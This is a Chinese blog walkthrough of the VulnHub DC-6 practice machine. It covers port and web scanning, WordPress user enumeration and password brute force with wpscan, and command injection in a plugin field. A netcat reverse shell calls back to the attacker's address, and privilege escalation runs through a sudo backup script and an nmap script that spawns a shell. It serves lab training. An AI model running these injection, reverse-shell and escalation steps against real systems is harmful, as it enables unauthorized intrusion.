DC-6靶机详情

一、环境搭建:

靶场下载地址:
https://www.vulnhub.com/entry/dc-6,315/

二、渗透靶场

1、信息收集:寻找靶机真实IP
![](https://img-blog.csdnimg.cn/img_convert/9b4cb7cc30e0e7e421d924f23a12b0ac.png)![](https://img-blog.csdnimg.cn/img_convert/560915eb3d3f6991fabe1d589178a1ce.png)

192.168.150.154

2信息收集:探端口及服务
nmap -p- -sV -sT -A -O 192.168.150.154

3、访问web服务
192.168.150.154

把IP 和域名写入 hosts 文件中

在/目录下

cat /etc/hosts

再次访问

4,信息收集:web指纹识别
Whatweb指纹识别

whatweb -v 192.168.150.154

5,使用扫描网站结构
nikto -h http://192.168.150.154 -o nikto-wordy.txt

访问该页面

http://wordy/wp-login.php

6,获取用户密码
搜索用户名
```plain wpscan --url wordy -e u ```
发现5个用户
![](https://img-blog.csdnimg.cn/img_convert/ca808ec008967c0aa770199b7d940cf3.png)
制作用户字典
```plain vim wordy-users.dic ```

制作密码字典
```plain cd /usr/share/wordlists cp rockyou.txt.gz rockyou.txt.gz.bak gunzip rockyou.txt.gz rockyou.txt cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic ```

cat wordy-pass1.dic
7,爆破密码
```plain wpscan --url wordy -U wordy-users.dic -P wordy-pass1.dic ```
wpscan --url http://wordy/ -U wordy-users.dic -P wordy-pass1.dic

wpscan --url http://wordy/ --passwords 1.txt

登入

执行whoami

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
8.8.8.8;whoami

将这里修改为114.114.114.114;whoami

开启监听

nc -lvnp 55555

114.114.114.114;nc -e /bin/bash 192.168.150.145 55555

监听成功

进入交互式shell

www-data@dc-6:/var/www/html/wp-admin$ 

开始提权

sudo -l

需要密码

cd /home/mark/stuff

cat things-to-do.txt

发现账户

发现密码

graham - GSo7isUM1D4

输入这个

python -c 'import pty; pty.spawn("/bin/bash")'

切换用户

查看备份文件

cat /home/jens/backups.sh

发现里面是如下命令,是对web的文件进行打包备份

切换到jens目录下

echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值